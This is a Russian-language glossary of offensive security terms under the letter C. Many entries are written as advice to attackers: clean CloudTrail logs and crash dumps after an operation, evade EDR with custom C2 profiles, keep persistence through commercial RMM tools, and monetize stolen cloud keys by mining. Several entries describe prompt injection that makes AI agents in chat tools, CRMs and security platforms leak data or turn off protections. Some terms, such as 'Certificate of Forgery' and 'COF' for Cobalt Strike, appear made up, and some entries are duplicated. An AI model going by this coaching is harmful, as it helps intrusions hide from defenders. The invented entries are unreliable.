ClickFix Метод социальной инженерии, при котором жертву заставляют скопировать вредоносный PowerShell скрипт и вставить его в Win+R (Run) или Windows Terminal. Сценарий: жертва видит фейковую CAPTCHA, ошибку "Windows Activation", или "Critical Update"; инструкция: нажми Win+R, вставь скрипт, нажми Enter. Скрипт скачивает и выполняет малварь (инфостилер, RAT, ransomware). ClickFix эволюционировал: теперь target Windows Terminal вместо Run, есть версии для macOS (MacSync infostealer через fake AI tools). ClickFix используется минимум четырьмя независимыми группами, включая операторов, связанных с Interlock.

Clickjacking Техника, при которой злоумышленник загружает целевой сайт в iframe, накладывает прозрачный слой с кнопками, и жертва, кликая на видимую кнопку, на самом деле кликает на скрытую кнопку на целевом сайте. Используется для: кражи сессий, выполнения действий от имени пользователя (например, "лайк" страницы), обхода CSRF-защит. Clickjacking может быть использован в комбинации с XSS для более сложных атак.

Client-Side Attack Атака, нацеленная на клиентское приложение (браузер, почтовый клиент, Office, PDF-ридер), а не на сервер. Примеры: XSS (браузер), macro malware (Office), PDF exploit (Adobe Reader), vishing (звонок человеку). Client-side attack часто используется для initial access, потому что клиентские приложения имеют широкие привилегии и часто уязвимы. The Com специализируется на client-side attack через vishing: атакует helpdesk, который является "клиентским" интерфейсом для администраторов.

Clipboard Hijacking Перехват содержимого буфера обмена. Используется для: подмены крипто-адресов (жертва копирует адрес кошелька, а вставляется адрес атакующего), кражи паролей (если пользователь копирует пароль из менеджера паролей). Clipboard hijacking реализуется через: малварь, которая мониторит clipboard (Windows API GetClipboardData), или через браузерные расширения.

Cloaking Маскировка: техники, скрывающие истинную природу трафика, файлов, процессов. Cloaking для C2: трафик выглядит как легитимный HTTPS. Cloaking для малвари: упаковка (packing), обфускация, шифрование, запуск из легитимных процессов. Cloaking для фишинга: подделка легитимных сайтов, URL, похожие на оригинальные (typosquatting). Cloaking основа evasion.

Clone (RFID) Клонирование RFID-карт (бесконтактных карт доступа, пропусков, ключей от гостиниц). Для клонирования используются устройства: Proxmark3, Flipper Zero, Chameleon Ultra. Клонирование возможно для карт без криптографической защиты (MIFARE Classic) или с взломанной защитой. Используется в физическом пентесте: клонируем пропуск сотрудника, чтобы пройти в офис (tailgating). Handala могла бы использовать клонирование RFID для физического доступа к Stryker, но выбрала удаленную атаку.

Clone Phishing Фишинг, при котором злоумышленник копирует легитимное письмо (из перехваченной переписки), заменяет ссылки или вложения на вредоносные, и отправляет жертве, часто с поддельного, но похожего email-адреса. Clone phishing эффективен, потому что письмо выглядит знакомым, использует контекст реальной переписки. Используется в BEC-атаках: копируем письмо от поставщика с просьбой оплатить счет, заменяем реквизиты.

Clop RaaS (Ransomware-as-a-Service) группа, известная атаками на MOVEit Transfer (2023), Accellion (2021). Clop использует Go-малварь, практикует двойной шантаж. Отличается высокой активностью в leak sites и использованием zero-day. В 2026 Clop остается активной, хотя некоторые операторы были арестованы. Для атакующего Clop пример успешной RaaS-модели, где разработчики получают процент с выкупов аффилиатов.

Cloud Cryptojacking Несанкционированное использование облачных ресурсов для майнинга криптовалют (чаще Monero). Компрометация AWS-ключа, Azure AD, GCP-аккаунта запуск EC2-инстансов, VM, Kubernetes-подов для майнинга. Cloud cryptojacking менее заметен, чем майнинг на локальных компьютерах, потому что облачные ресурсы масштабируются, а счета растут постепенно. Для атакующего cryptojacking способ монетизации доступа без шума, который создает ransomware.

Cloud Forensics Анализ инцидентов в облачных средах (AWS, Azure, GCP). Отличается от традиционной forensics: данные могут храниться в разных регионах, доступ к логам требует прав в IAM, цепочка доказательств сложнее. Для атакующего cloud forensics означает, что даже после уничтожения инстансов могут оставаться следы в CloudTrail, Flow Logs, и их нужно чистить так же тщательно, как локальные логи.

Cloud Hopper APT-кампания (2016-2018), в которой злоумышленники атаковали managed service providers (MSP) для доступа к их клиентам. Компрометация одного MSP дала доступ к десяткам организаций. Cloud Hopper классический пример supply chain атаки. ShinyHunters использовал аналогичный принцип: атака на Salesforce Experience Cloud дает доступ к сотням компаний-клиентов.

Cloud Service Provider (CSP) AWS, Azure, Google Cloud, Oracle Cloud. CSP хранят данные миллионов компаний и частных лиц. Для атакующего CSP цели: misconfig (публичные бакеты), уязвимости в API, кража ключей доступа. Удары IRGC по AWS дата-центрам (1 марта 2026) пример атаки на CSP как на критическую инфраструктуру, а не через сеть.

Cloud-to-Cloud Attack Атака, при которой злоумышленник переходит из одного облачного сервиса в другой, используя украденные OAuth-токены или учетные записи. Пример: компрометация Salesforce через OAuth токены доступ к Okta через Okta доступ к AWS. Cloud-to-cloud attack использует over-privileged integrations (интеграции с завышенными правами). ShinyHunters использует OAuth token theft для перехода между SaaS-платформами.

CMDB (Configuration Management Database) База данных конфигураций, содержащая информацию о всех активах организации: серверы, ПО, сетевые устройства, зависимости, владельцы. CMDB цель для энумерации после компрометации: знание структуры сети, критических систем, владельцев помогает планировать lateral movement. CMDB часто хранится в ServiceNow, Jira, Excel-файлах на файловых серверах.

CMOS Память, хранящая настройки BIOS (дата, время, порядок загрузки, пароли). Очистка CMOS (удаление батарейки) сбрасывает пароли BIOS. В контексте атак CMOS может быть использован для сброса защиты (если есть физический доступ) или для persistence (запись малвари в область CMOS). Однако современные системы используют UEFI, где CMOS менее важен.

CNA (CVE Numbering Authority) Организация, уполномоченная присваивать CVE-идентификаторы уязвимостям. CNA: Microsoft, Cisco, Google, Apple, MITRE (для открытого ПО). Когда CNA присваивает CVE и выпускает патч, уязвимость становится известной. Для атакующего CNA источник информации о fresh 1-day: мониторим CVE-идентификаторы, ждем подробностей.

CNAPP (Cloud Native Application Protection Platform) Платформа защиты облачных приложений, объединяющая: CSPM (Cloud Security Posture Management), CWPP (Cloud Workload Protection), CIEM (Cloud Infrastructure Entitlement Management). CNAPP использует AI для обнаружения угроз. Для атакующего CNAPP цель AILM: промпт-инъекция в CNAPP может привести к раскрытию конфигураций, отключению защиты.

CNC (Computer Numerical Control) Промышленные станки с числовым программным управлением. CNC-станки часто имеют встроенные ПК с Windows, подключены к корпоративной сети (или имеют удаленный доступ для техподдержки). Компрометация CNC может привести к физическому разрушению оборудования, остановке производства. JLR, Stryker производители, использующие CNC.

CNI (Critical National Infrastructure) Критическая национальная инфраструктура: энергетика, водоснабжение, транспорт, здравоохранение, связь, финансы. CNI главная цель государственных акторов (IRGC, APT28, Lazarus). Атака на CNI может иметь физические последствия: отключение электричества, нарушение водоснабжения, паралич экстренных служб. Handala атаковала Stryker (medical device manufacturer), который относится к CNI, потому что его продукты используются в больницах.

Coast Guard Береговая охрана США. В контексте атак Coast Guard может быть целью, если злоумышленники хотят нарушить морскую навигацию, портовую инфраструктуру, логистику. IRGC атаковал AWS дата-центры в ОАЭ и Бахрейне, что повлияло на логистику в регионе, включая порты.

Cobalt Strike Коммерческий C2-фреймворк для эмуляции атак, разработанный HelpSystems. Cobalt Strike широко используется злоумышленниками (включая взломанные лицензии) из-за богатого функционала: Beacon (агент), malleable C2 (кастомизация трафика), интеграция с внешними инструментами, автоматизация post-exploitation. Cobalt Strike активно детектится EDR, поэтому атакующие используют custom профили (malleable C2), модифицированные версии, или переходят на альтернативы (Sliver, Covenant).

Cobalt Strike Beacon Агент Cobalt Strike, работающий на скомпрометированной системе. Beacon выполняет команды от C2, может загружать модули, красть данные, латерально двигаться, шифровать файлы. Beacon может работать в memory-only режиме (не оставляя файлов на диске) и поддерживает различные C2-каналы (HTTP, HTTPS, DNS, SMB). Обнаружение Beacon приоритет для EDR.

Cobalt Strike Malleable C2 Механизм кастомизации Cobalt Strike: профиль, определяющий, как выглядит C2-трафик (заголовки, User-Agent, URL-паттерны, шифрование). Malleable C2 позволяет избежать сигнатурных детектов, имитируя легитимный трафик (например, как Google Analytics). Атакующие постоянно обновляют malleable C2 профили, чтобы обходить обновления детектов.

Code Injection Внедрение вредоносного кода в адресное пространство другого процесса. Виды: process injection (CreateRemoteThread, SetWindowsHookEx), DLL injection (LoadLibrary), APC injection (Asynchronous Procedure Call), reflective DLL injection (без вызова LoadLibrary), process hollowing (замена кода легитимного процесса). Code injection используется для: сокрытия активности (код выполняется в легитимном процессе), обхода firewall (процесс имеет разрешенные сетевые правила), обхода EDR (сложнее детектить, чем новый процесс).

Code Obfuscation Обфускация кода: преобразование исходного кода или бинарника в форму, сложную для понимания и анализа, но сохраняющую функциональность. Методы: переименование переменных, добавление мертвого кода, шифрование строк, контроль потока (flattening), упаковка (packing). Обфускация используется для: усложнения reverse engineering, обхода сигнатурных детектов, отсрочки анализа.

Code Signing Подпись кода цифровым сертификатом, подтверждающим, что код не был изменен после подписи и что издатель известен. ОС доверяют подписанному коду (меньше предупреждений, меньше блокировок). Атакующие используют: stolen code signing certificates (краденные у легитимных компаний), leaked certificates (из взломанных build-серверов), или покупку подписей у resellers, не проверяющих покупателей. Подписанная малварь реже блокируется антивирусами.

Code Signing Certificate Сертификат для подписи кода. Выдается удостоверяющими центрами (DigiCert, Sectigo, GlobalSign) после проверки юридического лица. Кража code signing certificate позволяет атакующему подписывать малварь от имени доверенной компании. Цена на даркнете: $500$5000 за действительный сертификат. Используется для обхода AppLocker, EDR, и пользовательских предупреждений.

Coercion Принуждение. В контексте физического пентеста: принуждение сотрудника открыть дверь, отключить сигнализацию, предоставить доступ. В контексте социальной инженерии: принуждение helpdesk сбросить MFA под давлением ("срочно, потерял доступ, начальник ждет"). Handala использовала coercion через угрозы смертью: "вы будете убиты, если не заплатите".

CoF (Certificate of Forgery) Документ, используемый в deepfake KYC для подтверждения личности (поддельные паспорта, водительские права, счета). CoF создаются с помощью AI: генерация лица (StyleGAN), генерация документов (шаблоны REAL ID, EU passport), добавление голограмм и микротекста. CoF проходят автоматические проверки KYC (биометрическое сравнение, проверка документов), потому что AI генерирует реалистичные изображения.

COF (Cobalt Strike Offensive Framework) Cobalt Strike коммерческий C2-фреймворк для эмуляции атак (офенсив-фреймворк). COF неофициальное сокращение. Cobalt Strike используется атакующими (через взломанные лицензии) и пентестерами. Включает: Beacon (агент), malleable C2 (кастомизация трафика), множество post-exploitation модулей (ключ к расшифровке), интеграцию с внешними инструментами. Cobalt Strike активно детектится EDR, поэтому атакующие используют custom профили (malleable C2), модифицированные версии (Cobalt Strike "cracked" с измененными сигнатурами), или переходят на альтернативы (Sliver, Covenant). COF стандарт для red teaming, но также широко используется black hat.

Cold Boot Attack Атака, при которой оперативная память (RAM) компьютера охлаждается (жидким азотом, спреем), чтобы данные сохранились после выключения, и затем считывается. RAM сохраняет данные несколько секунд после выключения; охлаждение продлевает это время. Cold boot attack используется для извлечения ключей шифрования (BitLocker, FileVault) из памяти. Требует физического доступа. Используется law enforcement для взлома зашифрованных устройств.

Cold Wallet Криптовалютный кошелек, не подключенный к интернету (аппаратный кошелек, бумажный кошелек, оффлайн-компьютер). Cold wallet считается более безопасным, чем hot wallet (подключенный). Bybit хранил ETH в cold wallet, но атака произошла через мультисиг (multisig) и подмену интерфейса. Cold wallet не защищает от атак, где жертва сама подписывает транзакцию, думая, что подписывает что-то другое.

Collaboration Tools Slack, Microsoft Teams, Discord, Zoom. Collaboration tools цель AILM: AI-агенты (Copilot, OpenClaw) интегрированы в эти платформы. Промпт-инъекция в сообщение может заставить AI-агента прочитать чувствительные данные и отправить их через auto-preview. Также collaboration tools используются для фишинга, vishing (звонки через Teams), кражи сессий (токены из cookies).

Collision (Hash) Ситуация, когда два разных входных данных дают одинаковый хэш (MD5, SHA1). Hash collision используется для подделки цифровых подписей, создания коллизий в SSL-сертификатах, обхода проверок целостности. MD5 и SHA1 считаются скомпрометированными: для них существуют практические атаки на коллизии. В 2026 SHA256 и SHA3 считаются безопасными, но legacy-системы все еще используют MD5/SHA1.

COM (Component Object Model) Технология Microsoft для межпроцессного взаимодействия и создания компонентов. COM используется в Windows для: OLE (встраивание объектов), ActiveX, DCOM (Distributed COM). COM hijacking техника persistence: замена легитимного COM-объекта на вредоносный, который будет загружаться при вызове. COM hijacking используется для запуска малвари при каждом запуске легитимного приложения (например, Explorer).

Com (The Com) Децентрализованная сеть киберпреступников (The Community), преимущественно англоязычных подростков. The Com не имеет единой иерархии, состоит из множества подгрупп: Hacker Com (взломы), IRL Com (физическое насилие), (S)extortion Com (сексуальная эксплуатация несовершеннолетних). Известные группы в The Com: Scattered Spider (vishing, helpdesk), LAPSUS$ (SaaS abuse), ShinyHunters (data extortion). Europol арестовала 30 членов The Com в 28 странах в марте 2026, но сеть продолжает существовать из-за децентрализованной структуры.

COM Hijacking Замена легитимного COM-объекта в реестре Windows на вредоносную DLL. При вызове COM-объекта (например, приложением) загружается вредоносная DLL. COM hijacking используется для persistence: малварь загружается при каждом запуске легитимного приложения, которое использует этот COM-объект. Трудно детектится, потому что DLL загружается из легитимного процесса.

Combination Lock Механический кодовый замок. В физическом пентесте открывается через: подбор комбинации (по износу кнопок), обход (сверловка), уязвимости (стандартные комбинации). Электронные кодовые замки могут быть взломаны через интерфейс (RS-485, Bluetooth) или клонирование RFID-карты.

COMINT (Communications Intelligence) Радиоразведка: перехват и анализ радиосигналов, спутниковой связи, сотовой связи. COMINT используется разведывательными службами. В контексте OSINT COMINT-данные могут быть доступны через публичные источники (спектрограммы, частоты). Для атакующего COMINT может быть источником информации о целях, использующих незащищенные радиоканалы (например, промышленные системы с радиосвязью).

Command Execution Выполнение команд на целевой системе. Достигается через: RCE (remote code execution), webshell, backdoor, интерактивный шелл. Command execution основа пост-эксплуатации. Атакующий может выполнять команды от имени текущего пользователя или с повышенными привилегиями (после LPE). Методы: system(), exec(), CreateProcess, PowerShell, WMI.

Commercial RMM Легитимные инструменты удаленного управления (Remote Management and Monitoring): AnyDesk, ScreenConnect (ConnectWise Control), TeamViewer, Splashtop, LogMeIn. The Com использует commercial RMM для persistence: после vishing на helpdesk убеждают установить RMM, затем используют его для доступа в любое время. Commercial RMM не блокируются EDR, потому что это легитимный софт, используемый администраторами.

Common Criteria Международный стандарт (ISO/IEC 15408) для оценки безопасности IT-продуктов. Продукты, сертифицированные по Common Criteria (например, для использования в government), считаются безопасными. Для атакующего Common Criteria означает, что в таких продуктах меньше очевидных уязвимостей, но они не гарантируют защиту от сложных APT-атак.

Common Vulnerabilities and Exposures (CVE) Словарь общеизвестных уязвимостей, управляемый MITRE. Каждая уязвимость получает уникальный идентификатор (CVE-2026-20131). CVE используется для: обмена информацией, приоритизации патчинга, отслеживания эксплуатации. Для атакующего CVE источник информации о fresh 1-day: мониторим новые CVE, читаем описания, ищем техники эксплуатации.

Community (The Com) The Com (The Community) децентрализованная сеть киберпреступников, преимущественно англоязычных подростков. The Com не имеет единой иерархии, состоит из множества подгрупп: Hacker Com (взломы, ransomware, data extortion), IRL Com (физическое насилие, порча имущества, экстремистская деятельность), (S)extortion Com (сексуальная эксплуатация несовершеннолетних, груминг, doxxing, swatting). Известные группы в The Com: Scattered Spider (vishing, helpdesk), LAPSUS$ (SaaS abuse, OAuth token theft), ShinyHunters (data extortion). Europol арестовала 30 членов The Com в 28 странах в марте 2026 (Project Compass), но сеть продолжает существовать из-за децентрализованной структуры. Для атакующего The Com источник TTPs, а также риск, так как The Com часто использует doxxing и swatting, что привлекает максимальное внимание law enforcement.

Compartmentalization Сегментация знаний в группе: каждый участник знает только то, что необходимо для его роли. Не знает полных имен других участников, не знает всей инфраструктуры, не знает конечной цели. Compartmentalization защищает группу: если одного участника поймают, он не сможет выдать остальных. В The Compartmentalization основа OPSEC: участники общаются через throwaway аккаунты, используют кодовые имена, не встречаются в реальной жизни.

Compliance Соответствие стандартам: GDPR (Европа), HIPAA (здравоохранение США), PCI-DSS (платежные карты), SOX (финансовая отчетность). Compliance используется как leverage в extortion: атакующие угрожают сообщить о нарушении compliance регуляторам, что влечет многомиллионные штрафы. Interlock цитирует GDPR и HIPAA в ransom notes, усиливая давление на жертву.

Component Object Model (COM) Технология Microsoft для межпроцессного взаимодействия и создания компонентов, используемая в Windows. COM позволяет создавать объекты, которые могут быть использованы разными приложениями. COM используется в: OLE (встраивание объектов), ActiveX, DCOM (Distributed COM). COM hijacking техника persistence: замена легитимного COM-объекта в реестре (CLSID) на вредоносную DLL. При вызове COM-объекта (например, приложением) загружается вредоносная DLL, выполняя код атакующего. COM также используется в UAC bypass, lateral movement (DCOM).

Compromised (Account) Учетная запись, доступ к которой получен злоумышленником. Compromised account initial access или результат lateral movement. Признаки: подозрительные входы (новое местоположение, необычное время), изменения настроек, отправка писем от имени пользователя. ShinyHunters использовал compromised accounts сотрудников для доступа к Salesforce через легитимные сессии.

CompuTrace ПО для удаленного управления и отслеживания устройств (также известно как LoJack for Laptops). CompuTrace встроен в BIOS некоторых ноутбуков (Dell, Lenovo) и может быть использован для удаленного стирания данных, геолокации, или установки ПО. Компрометация CompuTrace может дать атакующему постоянный доступ, который не сбрасывается переустановкой ОС.

ComSec (Communications Security) Безопасность коммуникаций: шифрование, защита от перехвата, аутентификация участников. В OPSEC атакующего ComSec означает: использование end-to-end шифрования (Signal, Matrix), PGP для email, исключение метаданных (не отправлять файлы с EXIF), использование nested onion (Tor over VPN).

Concealment Сокрытие: техники, делающие присутствие атакующего незаметным. Включает: очистку логов, memory-only payloads (без файлов на диске), использование легитимных процессов, маскировку C2-трафика, шифрование данных. Concealment основа долгосрочного присутствия.

Conduent BPO-гигант (бывшее подразделение Xerox). В марте 2026 Conduent объявил об утечке данных 25+ миллионов человек через взлом третьего партнера (supply chain). Украдены: SSN, медицинские данные, финансовая информация. Conduent пример атаки не на саму компанию, а на ее подрядчика, имевшего доступ к системам. Урок: supply chain атака может быть эффективнее прямой.

Conficker Червяк, поразивший миллионы компьютеров Windows в 2008-2009. Conficker использовал уязвимость в RPC (MS08-067), распространялся через сетевые папки, USB, и имел сложный DGA для C2. В 2026 Conficker считается legacy, но его техники (DGA, распространение через автозапуск) изучаются и повторяются. Conficker также показал, что даже после пика эпидемии, многие системы остаются зараженными годами.

Config (Misconfig) См. Misconfig (в букве M). Misconfig ошибка конфигурации, которая может привести к утечке данных, несанкционированному доступу, компрометации системы. Примеры: публичные S3-бакеты, guest user over-permission в Salesforce, открытые RDP-порты в интернет, default credentials, отсутствие MFA. Misconfig одна из главных причин утечек в 2026. ShinyHunters специализируется на поиске misconfig в Salesforce Experience Cloud. Для атакующего misconfig low-hanging fruit: не требует эксплойтов, достаточно найти и использовать.

Configuration Management Database (CMDB) База данных конфигураций, содержащая информацию о всех активах организации: серверы, ПО, сетевые устройства, зависимости, владельцы, IP-адреса. CMDB используется IT-отделами для управления инфраструктурой. Для атакующего CMDB золотая жила после компрометации: знание структуры сети, критических систем, владельцев помогает планировать lateral movement. CMDB часто хранится в ServiceNow, Jira, Excel-файлах на файловых серверах.

CONINT (Confidential Intelligence) Разведка, основанная на конфиденциальных источниках (агентурная, сигнальная). Для атакующего CONINT недоступна, но ее результаты могут влиять на операцию (например, если разведка США знает о планируемой атаке).

Container Breakout Побег из контейнера (Docker, LXC, Kubernetes pod) на хост-систему. Достигается через: уязвимости ядра (CVE-2019-5736, CVE-2020-15257), misconfig (привилегированные контейнеры), монтирование хостовых путей. Container breakout позволяет атакующему перейти из контейнера на хост и далее в другие контейнеры или сеть. В облачных средах контейнеры часто имеют доступ к хостовым API (metadata), что делает breakout особенно опасным.

Container Security Защита контейнерных сред. Для атакующего container security препятствие: сканирование образов, ограничение привилегий, runtime-защита (Falco). Однако многие контейнеры запускаются с избыточными правами (privileged, root), имеют уязвимые образы (не обновляются), или используют default secrets. Поиск таких контейнеров цель после initial access.

Conti RaaS-группа, активная в 2020-2022, известная атаками на критическую инфраструктуру (ирландская служба здравоохранения, правительство Коста-Рики). Conti распалась после утечки внутренней переписки (сотни тысяч сообщений) в 2022. В 2026 Conti legacy, но ее TTPs (двойной шантаж, использование Cobalt Strike, ручное управление атаками) используются современными группами. Утечка переписки Conti стала ценным источником информации о внутренней работе RaaS.

Continuity См. BCP (Business Continuity Plan). BCP план обеспечения непрерывности бизнеса после инцидента. Включает: процедуры восстановления, RTO (Recovery Time Objective), RPO (Recovery Point Objective), запасные мощности. Для атакующего BCP важен, потому что если у жертвы есть работающий BCP, она может быстро восстановиться и не заплатить выкуп. В атаке на JLR (5 недель простоя) BCP не сработал, так как атака была на ESXi. Handala атаковала Stryker через Intune, нарушив BCP.

Control Flow Guard (CFG) Защита Microsoft Windows, предотвращающая выполнение кода по невалидным адресам (косвенные вызовы функций). CFG проверяет, что целевой адрес вызова (например, через указатель на функцию) находится в списке разрешенных (валидных) адресов. Обход CFG: JOP (Jump-Oriented Programming), использование гаджетов, не проверяемых CFG, или эксплуатация багов в самой CFG. CFG включен по умолчанию в Windows 10/11 для системных процессов и может быть включен для приложений.

Control Plane Плоскость управления облаком: AWS Management Console, Azure Portal, GCP Console, API, IAM. Компрометация control plane дает атакующему полный контроль над облачной инфраструктурой: запуск/остановка инстансов, доступ к данным, создание пользователей. Handala атаковала control plane Microsoft Intune (через Global Admin) для уничтожения 200k устройств.

Convergence (Cyber-Kinetic) Конвергенция кибератак и кинетических (физических) ударов в рамках одной кампании. Март 2026: IRGC наносит удары дронами по AWS дата-центрам (kinetic), Handala атакует Stryker через Intune (cyber), MuddyWater взламывает IP-камеры для наведения ракет (cyber-enabled targeting). Cyber-kinetic convergence новая нормаль в государственных конфликтах. Для атакующего это означает, что кибероперации могут быть частью более широкого конфликта с физическими последствиями.

Cookie Theft Кража cookies браузера, содержащих сессионные токены. Используя украденные cookies, атакующий может войти в аккаунт жертвы без пароля и MFA. Методы: инфостилер (крадет cookies из браузера), XSS (document.cookie), перехват трафика (MITM). Cookie theft один из основных методов обхода MFA, потому что сессия уже аутентифицирована. ShinyHunters использовал cookie theft для доступа к Salesforce.

CORS (Cross-Origin Resource Sharing) Механизм, разрешающий или запрещающий веб-страницам из одного источника запрашивать ресурсы из другого. CORS misconfig (Access-Control-Allow-Origin: *, Access-Control-Allow-Credentials: true) может привести к утечке данных через междоменные запросы. Атакующий может использовать CORS misconfig для кражи API-ключей, токенов, чувствительных данных из легитимных приложений.

Cortex (XSOAR) SOAR-платформа (Security Orchestration, Automation, and Response) от Palo Alto Networks. Cortex автоматизирует реагирование на инциденты: сбор данных, блокировка IP, уведомления. Для атакующего Cortex означает, что защитники могут реагировать быстрее и эффективнее, если детекты настроены правильно.

Cospiracy Теории заговора. Используются в психологических операциях (psyops) для дезинформации, подрыва доверия к институтам, разжигания конфликтов. Iran использует cospiracy narratives в своих операциях влияния.

Covenant .NET C2-фреймворк с открытым кодом, альтернатива Cobalt Strike. Covenant поддерживает HTTP/HTTPS C2, встроенные механизмы AMSI bypass, ETW unhooking, и позволяет писать кастомные агенты на C#. Используется атакующими, которые хотят избежать лицензионных затрат и сигнатур Cobalt Strike. Covenant менее распространен, чем Cobalt Strike, но его популярность растет.

Covert Channel Скрытый канал связи, использующий ресурсы, не предназначенные для коммуникации, чтобы передать информацию незаметно. Примеры: изменение времени ответа сервера (timing channel), манипуляция ICMP-пакетами, скрытие данных в HTTP-заголовках, DNS-туннели. Covert channels используются для C2 и эксфильтрации данных, чтобы избежать детекции.

CP (Child Pornography) Детская порнография. The Com (Sextortion Com) занимается производством и распространением CP, а также сексуальной эксплуатацией несовершеннолетних (принуждение к созданию контента, угрозы публикации). Подгруппа 764 известна грумингом несовершеннолетних и поощрением самоубийств. Europol арестовала лидеров 764 в 2025. Для атакующего CP красная линия, переход на которую означает охоту со стороны всех law enforcement без исключения.

CPU (Central Processing Unit) Процессор. Уязвимости CPU: Spectre (2018), Meltdown (2018), ZombieLoad (2019), позволяющие читать память других процессов из пользовательского режима. Эти уязвимости до сих пор актуальны для старых систем, не обновленных микрокодами. Для атакующего CPU уязвимости могут дать доступ к памяти ядра, ключам шифрования, паролям из других виртуальных машин (в облачных средах).

CQ (Crypto Quarantine) Изоляция крипто-активов в отдельных кошельках, не связанных с основными операциями. Для атакующего CQ означает, что даже если он скомпрометирует один кошелек, основные средства останутся недоступны. Поэтому при атаке на крипто-биржи или DeFi-протоколы нужно искать доступ к hot wallets, приватным ключам, или мультисиг-подписям.

Crack (Password) Взлом пароля. Методы: брутфорс (перебор всех комбинаций), словарная атака (перебор по словарю), rainbow tables (предвычисленные хэши), атака по маске (знание формата). В 2026 для взлома NTLM-хэшей используются GPU-фермы (NVIDIA RTX 4090, A100) со скоростью ~300 млрд паролей в секунду. Хэши, полученные через DCSync, взламываются оффлайн.

Cracked Software Пиратское (взломанное) ПО, распространяемое через торренты, crack-сайты, файлообменники. Cracked software один из основных векторов распространения инфостилеров: жертва скачивает "crack" для Photoshop, WinRAR, игры, запускает его, получает малварь. RedLine, LummaC2 распространяются именно так. В корпоративной среде cracked software на рабочих компьютерах частая причина компрометации.

Cracking Процесс взлома защиты (паролей, шифрования, лицензий). Включает: оффлайн-взлом хэшей (Hashcat, John the Ripper), реверс-инжиниринг защиты, эксплуатацию уязвимостей. Cracking требует вычислительных ресурсов (GPU, CPU) и знаний криптографии. Результаты cracking используются для получения доступа, эскалации привилегий, или монетизации (взломанные аккаунты).

Crash Падение системы (BSOD в Windows, kernel panic в Linux). Crash может быть вызван DoS-атакой, эксплуатацией уязвимости, или ошибкой в малвари. Crash dump (дамп памяти) может содержать чувствительную информацию (пароли, ключи), которую можно извлечь при анализе. Атакующий может вызвать crash, чтобы затем проанализировать дамп памяти.

Crash Dump Дамп памяти, создаваемый при падении системы. Crash dump может содержать: пароли в открытом виде, ключи шифрования, содержимое процессов, сетевые соединения. Атакующий, имеющий доступ к crash dump, может извлечь эти данные. В Windows crash dump расположен в %SystemRoot%\MEMORY.DMP; в Linux в /var/crash/. Очистка crash dumps часть послеоперационной чистки.

Crawl (Web) Сканирование веб-сайтов (web crawling) для сбора информации: структура сайта, скрытые страницы (robots.txt, sitemap), метаданные, уязвимости. Crawling используется в рекогносцировке для поиска: админ-панелей, тестовых страниц, старых версий, файлов конфигурации. ShinyHunters crawling Salesforce Experience Cloud сайтов для поиска /s/sfsites/aura эндпоинтов.

Crawler Бот для сканирования (crawling). Crawler может быть легитимным (Googlebot) или злоумышленным (для сбора данных). Злоумышленные crawlers игнорируют robots.txt, ищут уязвимости, собирают email-адреса. Crawlers используются для массового поиска целей.

Cream (Cream Finance) DeFi-протокол на BNB Chain и Ethereum. В январе 2026 Cream Finance потерял $43M через flash loan атаку, эксплуатировавшую уязвимость в оракуле цен. Атакующий использовал флеш-кредит для манипуляции ценой токена и вывода ликвидности. Cream пример уязвимости DeFi-протоколов, где flash loan используется как усилитель.

Credential Dumping Дамп учетных данных (паролей, хэшей, токенов) из памяти, файловой системы, реестра. Методы: дамп LSASS (Mimikatz sekurlsa::logonpasswords), дамп NTDS.dit (база AD), дамп браузерных хранилищ, дамп DPAPI. Credential dumping основа lateral movement и persistence.

Credential Stuffing Автоматизированный перебор логин-парольных пар, полученных из утечек, на разных сервисах. Credential stuffing использует тот факт, что пользователи повторяют пароли. Эффективность: 0.1-1% паролей оказываются валидными. В 2026 credential stuffing автоматизирован: ботнеты, ML-фильтрация валидных аккаунтов, обход CAPTCHA, распределенные прокси.

Creeper Первый компьютерный вирус (1971), разработанный Бобом Томасом для ARPANET. Creeper просто выводил сообщение "I'm the creeper, catch me if you can!" и перемещался на другие компьютеры. В 2026 Creeper исторический артефакт.

CREST Организация по сертификации пентестеров (CREST Approved). Компании, сертифицированные CREST, считаются профессиональными. Для атакующего CREST интересна как источник информации о том, какие техники пентеста считаются "стандартными", и какие детекты могут быть настроены на них.

Criminal (Cyber) Киберпреступник. Включает: black hat хакеров, аффилиатов RaaS, операторов инфостилеров, кардеров, BEC-мошенников. Criminal действует для получения финансовой выгоды. Государственные хакеры (APT) не criminal в уголовном смысле (действуют по указанию правительства), но часто описываются как criminal actors в отчетах.

Crippling Вывод из строя (криплингов) системы или организации. Цель деструктивных атак (wiper) crippling, а не выкуп. Handala crippled Stryker: 200k устройств wiped, 50TB данных exfiltrated, производство остановлено. Crippling может быть конечной целью государственных акторов, а не промежуточным этапом для выкупа.

Critical Infrastructure Критическая инфраструктура: энергетика, водоснабжение, транспорт, здравоохранение, связь, финансы. Critical infrastructure главная цель государственных акторов. Handala атаковала Stryker (medical device manufacturer, part of healthcare infrastructure). IRGC атаковал AWS data centers (cloud infrastructure). Атаки на critical infrastructure имеют физические последствия.

CRL (Certificate Revocation List) Список отозванных сертификатов, публикуемый удостоверяющими центрами. Приложения проверяют CRL, чтобы убедиться, что сертификат не был отозван. Для атакующего CRL важен, если он использует stolen certificate: нужно проверять, не попал ли сертификат в CRL, иначе соединение будет отклонено. Однако многие приложения не проверяют CRL (для производительности), что позволяет использовать отозванные сертификаты.

CRM (Customer Relationship Management) Salesforce, HubSpot, Microsoft Dynamics, Open Mercato. CRM цель AILM: AI-агенты в CRM (Einstein, Copilot) могут быть скомпрометированы через промпт-инъекции в полях (комментарии, заметки). CRM содержат PII миллионов клиентов, что делает их привлекательной целью для extortion.

Cross-Site Request Forgery (CSRF) Подделка межсайтового запроса: атакующий заставляет браузер жертвы отправить HTTP-запрос на целевой сайт, используя cookies жертвы. CSRF используется для изменения данных, перевода средств, смены пароля от имени жертвы. Защита: CSRF-токены, SameSite cookies. В 2026 CSRF встречается в старых приложениях и API, где нет токенов.

Cross-Site Scripting (XSS) Внедрение JavaScript-кода в веб-страницу. XSS позволяет: красть cookies (session hijacking), выполнять действия от имени пользователя, фишинг, распространение малвари. Типы: reflected XSS (срабатывает при переходе по ссылке), stored XSS (хранится в базе данных), DOM-based XSS (манипуляция DOM). ShinyHunters мог использовать stored XSS в Salesforce Experience Cloud для кражи сессий суперадминов.

